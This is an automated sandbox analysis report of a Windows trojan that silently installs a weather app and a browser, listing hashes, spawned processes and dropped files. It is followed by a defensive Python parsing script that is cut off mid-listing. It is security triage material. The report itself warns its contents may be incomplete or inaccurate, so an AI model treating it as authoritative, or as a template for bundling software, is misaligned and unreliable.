Trojan.Win32.Badur.gbfp (Kaspersky), Trojan.Downloader.Hicrazyk.A (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b8d0ff525ff7e4f2b2c577519665c147
SHA1: aadac4ce2627b4d2d0b80c81b4acf33a8c4bdca0
SHA256: 9875f9087f10b00f5854f1bc9e0e681e8ffa585e5e7ad72e06143a2900730aa2
SSDeep: 24576:mPfB4jcK3yXahZe txE6ZrCcQFLPlVBzXh9BrqY:gyj2a3HEOOcQFLBbzd5
Size: 1237882 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
worldweather.exe:2452
worldWeatherUpdate.5002.exe:2896
365weatherIns_61.exe:408
greendou.exe:772
worldWeatherRealTime5002.exe:2408
The Trojan injects its code into the following process(es):
%original file name%.exe:204
File activity
The process worldweather.exe:2452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@uujzy[1].txt (139 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\go[1].htm (0 bytes)
The process worldWeatherUpdate.5002.exe:2896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\369[1].ico (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\PM10Context[1].xml (835 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\WeatherContext[1].xml (509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\PM25Context[1].xml (624 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (1196 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sina.com[1].txt (196 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\AQIContext[1].xml (365 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\366[1].ico (16369 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (0 bytes)
The process 365weatherIns_61.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
%Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
%Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
%Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\ToggleImages.html (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_next.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (80589 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading1.bmp (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\tongji_61[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox1.bmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\tongji.html (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\inetc.dll (784 bytes)
%Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\2.jpg (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_close.bmp (1 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (325 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\bg.bmp (18424 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
%Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\3.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsWindows.dll (10 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报卸载.lnk (911 bytes) (file name decoded from GBK; "Dazhong Weather Forecast Uninstall" shortcut)
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\md5dll.dll (8 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报.lnk (943 bytes) (file name decoded from GBK; "Dazhong Weather Forecast" shortcut)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox2.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading2.bmp (696 bytes)
%Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\1.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_complete.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (352 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp (0 bytes)
The process greendou.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[2].js (7666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_[1].css (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[2] (10367 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\guide_tip[1].png (1459 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX6.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\lk_jumei[1].png (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\titlebg[1].png (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[1].js (6192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[2].js (1187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\foot_slider[1].jpg (322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[1].js (17536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512170407_319[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[2].js (1208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20130820165531_481[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[1].png (1848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[2].js (2605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\skin2_0[1].gif (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140508103513_537[1].gif (6813 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140512170546_833[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[2].txt (1879 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\skin3[1].gif (1314 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[1].txt (1398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\fine_cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[1].js (7992 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (11568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[2].js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\v53_2icos[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\favicon[1].ico (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1].htm (7472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setskinbg[1].gif (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fbg_about[1].png (805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1] (14016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\v53_arrow_h[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[2].js (4349 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\img-video-2[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[1].js (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\get_tj[1].php (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140513112717_7[1].jpg (3852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\guide_tip[1].png (2319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_tips_n1[1].gif (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wan.sogou[1].txt (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setting_icon[1].gif (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\rec[1].do (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\get_123_v53[1].php (16030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\subnav_v41[1].png (682 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512112800_851[1].jpg (2380 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (2306 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\20130531144119_126[1].png (3810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v53_bicos[1].gif (826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[1].js (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[2].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\logo_1112293[1].gif (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\search_arrow[1].gif (447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\i-ico-2b[1].png (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\icon4[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[2].js (19464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140507144656_823[1].jpg (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fIXLig2wT89333[1].jpg (2500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[2].png (1606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\selogo_111207[1].png (2008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[1].js (4851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\img-news[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\new-ico[1].png (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\1oq9Gg9Y3L8813[1].jpg (1492 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140507144124_693[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\new-erweima2[1].png (2985 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1] (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\guide_tip[1].png (0 bytes)
The process %original file name%.exe:204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\processwork.dll (6140 bytes)
%Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
%Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (119257 bytes)
%Program Files%\greeou\profile\Template\start\style.css (3 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
%Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
%Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
%Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
%Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
%Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
%Program Files%\greeou\profile\Template\start\index.html (832 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
%Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
%Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
%Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
%Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
%Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
%Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
%Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (354562 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
%Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Inetc.dll (20 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
%Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
%Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
%Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
%Program Files%\greeou\profile\Template\start\left.html (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (902 bytes)
%Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
%Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
%Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
%Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
%Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
%Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (3 bytes)
%Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
%Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\绿豆浏览器\绿豆浏览器.lnk (678 bytes) (name decoded from GBK; "Green Bean Browser", i.e. GreenDou)
%Documents and Settings%\%current user%\Desktop\绿豆浏览器.lnk (666 bytes) (name decoded from GBK; "Green Bean Browser" desktop shortcut)
%Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
%Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (348 bytes)
%Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
%Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
%Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
%Program Files%\greeou\ico\taobao.ico (2104 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
%Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\nsRandom.dll (935 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
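The file activity above is raw sandbox output. The following Python example is added here and is neither part of the Lavasoft report nor code belonging to the analysed sample: it parses lines in this report's format, reconstructs which process dropped which executable (sample, then the bundled installers, then the "products" they install), separates the NSIS plug-in DLLs staged in %Temp%\ns*.tmp from the payload written to %Program Files%, and lists the Start Menu and Desktop shortcuts. The sample text is a subset of lines copied from the report above; the regular expressions are the example's own assumptions about the report layout.

```python
"""Triage the sandbox 'File activity' section: rebuild the dropper chain,
separate NSIS plug-in staging from the installed payload, list shortcuts.
Added example; SAMPLE is a subset of lines copied from the report above."""
import re
from collections import defaultdict

PROCESS_RE = re.compile(
    r"^The process (?P<name>.+?):(?P<pid>\d+) makes changes in the file system\.$")
FILE_RE = re.compile(r"^(?P<path>.+) \((?P<size>\d+) bytes\)$")
# NSIS unpacks its plug-in DLLs into %Temp%\ns<xx>.tmp\ and deletes that dir on exit.
NSIS_TMP_RE = re.compile(r"\\Local Settings\\Temp\\ns[a-z0-9]+\.tmp\\", re.IGNORECASE)
PE_EXT = (".exe", ".dll")

SAMPLE = r"""
The process 365weatherIns_61.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
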